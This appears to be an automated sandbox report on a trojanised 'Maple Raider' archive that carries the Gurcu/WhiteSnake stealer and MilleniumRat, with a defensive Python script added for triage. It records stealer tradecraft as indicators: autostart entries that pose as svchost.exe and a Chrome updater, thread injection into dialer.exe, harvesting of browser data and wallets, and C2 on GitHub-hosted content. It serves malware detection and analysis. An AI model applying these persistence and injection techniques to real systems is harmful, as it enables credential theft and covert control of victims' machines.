Malware Analysis Report

2024-11-30 13:20

Sample ID 241119-vflkqaycpa
Target MapleRaiderLatest.zip
SHA256 4b86d94ea8d7d5b71d124fdb17165df75aaee0c89d206384f7653839e696d542
Tags
upx gurcu milleniumrat collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation pyinstaller rat spyware stealer
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

4b86d94ea8d7d5b71d124fdb17165df75aaee0c89d206384f7653839e696d542

Threat Level: Known bad

The file MapleRaiderLatest.zip was found to be: Known bad.

Malicious Activity Summary

Gurcu family

Gurcu, WhiteSnake

Suspicious use of NtCreateProcessExOtherParentProcess

MilleniumRat

Suspicious use of NtCreateUserProcessOtherParentProcess

Milleniumrat family

Contacts a large (1158) number of remote hosts

Command and Scripting Interpreter: PowerShell

Stops running service(s)

Checks BIOS information in registry

Checks computer location settings

Clipboard Data

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Unsecured Credentials: Credentials In Files

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Obfuscated Files or Information: Command Obfuscation

Adds Run key to start application

Looks up external IP address via web service

Enumerates processes with tasklist

Suspicious use of SetThreadContext

Drops file in System32 directory

UPX packed file

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Detects Pyinstaller

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Browser Information Discovery

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry key

Modifies data under HKEY_USERS

Checks processor information in registry

Checks SCSI registry key(s)

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Detects videocard installed

Gathers system information

Suspicious use of SetWindowsHookEx

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-19 16:56

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-19 16:55

Reported

2024-11-19 16:58

Platform

win7-20241023-en

Max time kernel

118s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe

"C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe"

C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe

"C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI21322\python310.dll

MD5 4a6afa2200b1918c413d511c5a3c041c
SHA1 39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3
SHA256 bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da
SHA512 dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20

memory/444-14-0x000007FEF6680000-0x000007FEF6AE6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-19 16:55

Reported

2024-11-19 16:58

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

155s

Command Line

winlogon.exe

Signatures

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

MilleniumRat

rat stealer milleniumrat

Milleniumrat family

milleniumrat

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 5332 created 3304 N/A C:\Windows\system32\WerFault.exe C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

Contacts a large (1158) number of remote hosts

discovery

Stops running service(s)

evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\ProgramData\main.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe N/A (2 events)
N/A N/A C:\ProgramData\Microsoft\based.exe N/A (2 events)
N/A N/A C:\ProgramData\Microsoft\hacn.exe N/A (2 events)
N/A N/A C:\ProgramData\Microsoft\based.exe N/A (15 events)
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A (26 events)
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe" C:\ProgramData\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A (4 events)

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A (4 events)

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\ProgramData\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5332 set thread context of 6124 N/A C:\ProgramData\setup.exe C:\Windows\System32\dialer.exe
PID 6916 set thread context of 3532 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\dialer.exe
PID 6916 set thread context of 5980 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\dialer.exe
PID 6916 set thread context of 6476 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\dialer.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (55 matches; no per-file details reported)

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\ProgramData\setup.exe N/A
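The "Adds Run key to start application", "Suspicious use of SetThreadContext" and "Drops file in Program Files directory" rows above form one chain: C:\ProgramData\setup.exe drops updater.exe under Program Files\Google\Chrome, both then set the thread context of C:\Windows\System32\dialer.exe, and the two Run values point at copies of svchost.exe and Update.exe in user-writable directories. The script below is an added example, not part of this report or of any sandbox vendor's tooling. It parses rows in the flattened "Description Indicator Process Target" layout used on this page and flags those patterns. The five sample rows are copied from the tables above; the directory lists, the set of Windows binary names treated as masquerading targets, and the severity labels are this example's own assumptions.

```python
"""Triage of flattened sandbox signature rows (added example; assumptions are marked)."""
import re
from dataclasses import dataclass

# Rows copied verbatim from the behavioral2 tables of this report (constructed input).
SAMPLE_ROWS = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe" C:\ProgramData\svchost.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" C:\Windows\system32\reg.exe N/A',
    r"PID 5332 set thread context of 6124 N/A C:\ProgramData\setup.exe C:\Windows\System32\dialer.exe",
    r"PID 6916 set thread context of 3532 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\dialer.exe",
    r"File created C:\Program Files\Google\Chrome\updater.exe C:\ProgramData\setup.exe N/A",
]

# Assumptions of this example, not values taken from the report.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\programdata\\", "\\appdata\\", "c:\\users\\public\\")
SYSTEM_BINARY_NAMES = {"svchost.exe", "dialer.exe", "winlogon.exe", "explorer.exe", "rundll32.exe"}

# Row layouts as they appear on the page: "<description> <indicator> <process> <target>".
RUN_RE = re.compile(r'^Set value \(\w+\) \\REGISTRY\\.+?\\Run\\(?P<name>\S+) = "(?P<value>.*?)" (?P<proc>.+?) N/A$')
CTX_RE = re.compile(r"^PID (?P<src>\d+) set thread context of (?P<dst>\d+) N/A "
                    r"(?P<injector>[A-Za-z]:\\.+?\.exe) (?P<target>[A-Za-z]:\\.+?\.exe)$", re.I)
DROP_RE = re.compile(r"^File created (?P<path>[A-Za-z]:\\.+?) (?P<dropper>[A-Za-z]:\\.+?) N/A$")


@dataclass(frozen=True)
class Finding:
    kind: str       # "persistence" or "injection"
    severity: str
    detail: str


def _norm(path: str) -> str:
    """Lower-case a path and collapse the doubled backslashes the report uses inside quoted values."""
    return path.replace("\\\\", "\\").lower()


def _basename(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def is_system_dir(path: str) -> bool:
    return _norm(path).startswith(SYSTEM_DIRS)


def is_user_writable(path: str) -> bool:
    return any(tag in _norm(path) for tag in USER_WRITABLE)


def parse_rows(rows):
    """Split rows into Run-key writes, thread-context writes and file drops; other rows are ignored."""
    runs, injections, drops = [], [], []
    for row in rows:
        if m := RUN_RE.match(row):
            runs.append({"name": m["name"], "path": m["value"].replace("\\\\", "\\"), "setter": m["proc"]})
        elif m := CTX_RE.match(row):
            injections.append({"src": int(m["src"]), "dst": int(m["dst"]),
                               "injector": m["injector"], "target": m["target"]})
        elif m := DROP_RE.match(row):
            drops.append({"path": m["path"], "dropper": m["dropper"]})
    return runs, injections, drops


def triage(rows):
    """Return findings: autostart entries that look planted, and injections into Windows binaries."""
    runs, injections, drops = parse_rows(rows)
    dropper_of = {_norm(d["path"]): d["dropper"] for d in drops}
    findings = []
    for r in runs:
        reasons = []
        if is_user_writable(r["path"]):
            reasons.append("autostart target lives in a user-writable directory")
        if _basename(r["path"]) in SYSTEM_BINARY_NAMES and not is_system_dir(r["path"]):
            reasons.append("system binary name outside System32 (masquerading)")
        if _basename(r["setter"]) == "reg.exe":
            reasons.append("value written through reg.exe rather than by the binary itself")
        if reasons:
            findings.append(Finding("persistence", "high",
                                    f"Run\\{r['name']} -> {r['path']}: " + "; ".join(reasons)))
    for i in injections:
        # A binary outside the system directories rewriting a thread of a System32 process
        # (dialer.exe here) is the hollowing pattern; tie the injector back to whoever dropped it.
        if is_system_dir(i["target"]) and not is_system_dir(i["injector"]):
            detail = (f"PID {i['src']} ({i['injector']}) set thread context of "
                      f"PID {i['dst']} ({i['target']})")
            if dropper := dropper_of.get(_norm(i["injector"])):
                detail += f"; injector was dropped by {dropper}"
            findings.append(Finding("injection", "high", detail))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f"[{f.severity}] {f.kind}: {f.detail}")
```

Run as-is it reports two planted Run values and two hollowing events, the second of which is attributed to setup.exe through the "File created" row. Feeding it the full row set of a report of this layout is enough to produce a first hunting list; the regexes deliberately key on the drive-letter boundary between the Process and Target columns because both columns can contain spaces.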

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
